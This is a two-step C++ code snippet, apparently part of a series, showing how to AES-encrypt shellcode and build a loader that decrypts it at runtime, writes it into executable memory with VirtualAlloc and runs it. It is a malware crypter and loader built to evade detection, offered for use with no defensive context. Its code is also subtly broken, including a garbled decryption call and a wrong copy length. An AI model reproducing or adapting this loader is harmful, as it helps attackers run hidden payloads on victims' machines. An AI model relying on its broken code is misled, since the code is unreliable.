1d. AES-Based Self-Decrypting Payload (C++)

3. AES-Based Self-Decrypting Payload (C++)

Step 1: Encrypt the Shellcode

#include <iostream>
#include <vector>
#include <openssl/evp.h>
#include <openssl/rand.h>

#define AES_KEY_SIZE 32
#define AES_IV_SIZE 16

std::vector<unsigned char> aes_encrypt(const std::vector<unsigned char>& data, const std::vector<unsigned char>& key, const std::vector<unsigned char>& iv) {
    std::vector<unsigned char> encrypted(data.size() + AES_BLOCK_SIZE);
    int len, enc_len;

    EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
    EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key.data(), iv.data());
    EVP_EncryptUpdate(ctx, encrypted.data(), &len, data.data(), data.size());
    enc_len = len;
    EVP_EncryptFinal_ex(ctx, encrypted.data() + len, &len);
    enc_len += len;
    EVP_CIPHER_CTX_free(ctx);

    encrypted.resize(enc_len);
    return encrypted;
}

int main() {
    std::vector<unsigned char> shellcode = { /* Your original shellcode */ };
    std::vector<unsigned char> key(AES_KEY_SIZE, 'A');
    std::vector<unsigned char> iv(AES_IV_SIZE, 'B');

    std::vector<unsigned char> encrypted_shellcode = aes_encrypt(shellcode, key, iv);

    std::cout << "unsigned char payload[] = { ";
    for (auto byte : encrypted_shellcode) {
        std::cout << "0x" << std::hex << (int)byte << ", ";
    }
    std::cout << "};\n";

    return 0;
}

Run this and replace payload[] in Step 2.

Step 2: Self-Decrypting Payload (With Memory Execution)

#include <windows.h>
#include <vector>
#include <iostream>
#include <openssl/evp.h>

#define AES_KEY_SIZE 32
#define AES_IV_SIZE 16

std::vector<unsigned char> aes_decrypt(const std::vector<unsigned char>& data, const std::vector<unsigned char>& key, const std::vector<unsigned char>& iv) {
    std::vector<unsigned char> decrypted(data.size());
    int len, dec_len;

    EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
    EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key.data(), iv.data());
    EVP_DecryptUpdate(ctx, decrypted.data(), &len, data.data(), data.size());
    dec_len = len;
    EVP_DecryptFinal_ex(ctx, decrypted.data() + len, &len);
    dec_len += len;
    EVP_CIPHER_CTX_free(ctx);

    decrypted.resize(dec_len);
    return decrypted;
}

int main() {
    unsigned char payload[] = { /* Encrypted shellcode goes here */ };
    size_t payload_size = sizeof(payload);
    std::vector<unsigned char> key(AES_KEY_SIZE, 'A');
    std::vector<unsigned char> iv(AES_IV_SIZE, 'B');

    std::vector<unsigned char> decrypted = aes_decryptvector<unsigned char>(payload, payload + payload_size), key, iv;

    void* exec_mem = VirtualAlloc(NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(exec_mem, decrypted.data(), payload_size);

    ((void(*)())exec_mem)();
    return 0;
}